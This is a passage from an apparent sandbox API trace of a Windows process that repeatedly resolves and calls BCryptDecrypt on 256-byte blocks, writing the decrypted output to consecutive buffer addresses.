dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2053cc2, pcbResult=0x14f8fc) returned 0x0 [0176.324] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.324] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e907d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2053db7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2053db7, pcbResult=0x14f8fc) returned 0x0 [0176.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.326] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e908d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2053eac, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2053eac, pcbResult=0x14f8fc) returned 0x0 [0176.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.327] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e909d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2053fa1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2053fa1, pcbResult=0x14f8fc) returned 0x0 [0176.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.329] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e90ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2054096, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2054096, pcbResult=0x14f8fc) returned 0x0 [0176.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.330] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e90bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205418b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205418b, pcbResult=0x14f8fc) returned 0x0 [0176.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.332] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e90cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2054280, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2054280, pcbResult=0x14f8fc) returned 0x0 [0176.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.333] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e90dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2054375, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2054375, pcbResult=0x14f8fc) returned 0x0 [0176.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.334] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e90ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205446a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205446a, pcbResult=0x14f8fc) returned 0x0 [0176.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.336] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e90fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205455f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205455f, pcbResult=0x14f8fc) returned 0x0 [0176.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.337] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e910d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2054654, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2054654, pcbResult=0x14f8fc) returned 0x0 [0176.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.339] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e911d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2054749, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2054749, pcbResult=0x14f8fc) returned 0x0 [0176.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.340] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e912d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205483e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205483e, pcbResult=0x14f8fc) returned 0x0 [0176.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.507] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e913d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2054933, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2054933, pcbResult=0x14f8fc) returned 0x0 [0176.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.508] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e914d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2054a28, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2054a28, pcbResult=0x14f8fc) returned 0x0 [0176.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.509] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e915d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2054b1d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2054b1d, pcbResult=0x14f8fc) returned 0x0 [0176.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.511] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e916d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2054c12, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2054c12, pcbResult=0x14f8fc) returned 0x0 [0176.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.512] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e917d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2054d07, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2054d07, pcbResult=0x14f8fc) returned 0x0 [0176.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.514] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e918d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2054dfc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2054dfc, pcbResult=0x14f8fc) returned 0x0 [0176.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.515] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e919d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2054ef1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2054ef1, pcbResult=0x14f8fc) returned 0x0 [0176.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.516] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e91ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2054fe6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2054fe6, pcbResult=0x14f8fc) returned 0x0 [0176.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.518] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e91bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20550db, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20550db, pcbResult=0x14f8fc) returned 0x0 [0176.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.519] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e91cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20551d0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20551d0, pcbResult=0x14f8fc) returned 0x0 [0176.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.520] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e91dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20552c5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20552c5, pcbResult=0x14f8fc) returned 0x0 [0176.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.522] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e91ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20553ba, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20553ba, pcbResult=0x14f8fc) returned 0x0 [0176.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.523] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e91fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20554af, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20554af, pcbResult=0x14f8fc) returned 0x0 [0176.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.524] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e920d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20555a4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20555a4, pcbResult=0x14f8fc) returned 0x0 [0176.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.526] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e921d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2055699, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2055699, pcbResult=0x14f8fc) returned 0x0 [0176.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.527] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e922d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205578e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205578e, pcbResult=0x14f8fc) returned 0x0 [0176.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.529] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e923d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2055883, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2055883, pcbResult=0x14f8fc) returned 0x0 [0176.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.530] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e924d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2055978, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2055978, pcbResult=0x14f8fc) returned 0x0 [0176.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.532] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e925d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2055a6d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2055a6d, pcbResult=0x14f8fc) returned 0x0 [0176.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.533] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e926d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2055b62, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2055b62, pcbResult=0x14f8fc) returned 0x0 [0176.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.536] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e927d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2055c57, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2055c57, pcbResult=0x14f8fc) returned 0x0 [0176.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.538] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e928d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2055d4c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2055d4c, pcbResult=0x14f8fc) returned 0x0 [0176.688] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.688] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e929d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2055e41, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2055e41, pcbResult=0x14f8fc) returned 0x0 [0176.690] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.690] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e92ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2055f36, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2055f36, pcbResult=0x14f8fc) returned 0x0 [0176.691] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.691] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e92bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205602b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205602b, pcbResult=0x14f8fc) returned 0x0 [0176.693] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.693] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e92cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2056120, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2056120, pcbResult=0x14f8fc) returned 0x0 [0176.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.695] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e92dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2056215, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2056215, pcbResult=0x14f8fc) returned 0x0 [0176.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.696] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e92ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205630a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205630a, pcbResult=0x14f8fc) returned 0x0 [0176.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.698] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e92fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20563ff, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20563ff, pcbResult=0x14f8fc) returned 0x0 [0176.699] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.699] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e930d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20564f4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20564f4, pcbResult=0x14f8fc) returned 0x0 [0176.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.701] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e931d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20565e9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20565e9, pcbResult=0x14f8fc) returned 0x0 [0176.703] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.703] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e932d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20566de, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20566de, pcbResult=0x14f8fc) returned 0x0 [0176.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.705] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e933d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20567d3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20567d3, pcbResult=0x14f8fc) returned 0x0 [0176.706] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.706] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e934d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20568c8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20568c8, pcbResult=0x14f8fc) returned 0x0 [0176.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.708] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e935d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20569bd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20569bd, pcbResult=0x14f8fc) returned 0x0 [0176.709] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.709] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e936d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2056ab2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2056ab2, pcbResult=0x14f8fc) returned 0x0 [0176.711] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.711] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e937d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2056ba7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2056ba7, pcbResult=0x14f8fc) returned 0x0 [0176.712] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.712] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e938d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2056c9c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2056c9c, pcbResult=0x14f8fc) returned 0x0 [0176.713] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.713] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e939d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2056d91, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2056d91, pcbResult=0x14f8fc) returned 0x0 [0176.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.715] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e93ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2056e86, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2056e86, pcbResult=0x14f8fc) returned 0x0 [0176.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.716] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e93bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2056f7b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2056f7b, pcbResult=0x14f8fc) returned 0x0 [0176.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.718] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e93cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2057070, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2057070, pcbResult=0x14f8fc) returned 0x0 [0176.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.719] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e93dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2057165, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2057165, pcbResult=0x14f8fc) returned 0x0 [0176.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.720] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e93ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205725a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205725a, pcbResult=0x14f8fc) returned 0x0 [0176.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.722] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e93fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205734f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205734f, pcbResult=0x14f8fc) returned 0x0 [0176.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.887] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e940d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2057444, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2057444, pcbResult=0x14f8fc) returned 0x0 [0176.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.888] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e941d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2057539, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2057539, pcbResult=0x14f8fc) returned 0x0 [0176.924] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.924] 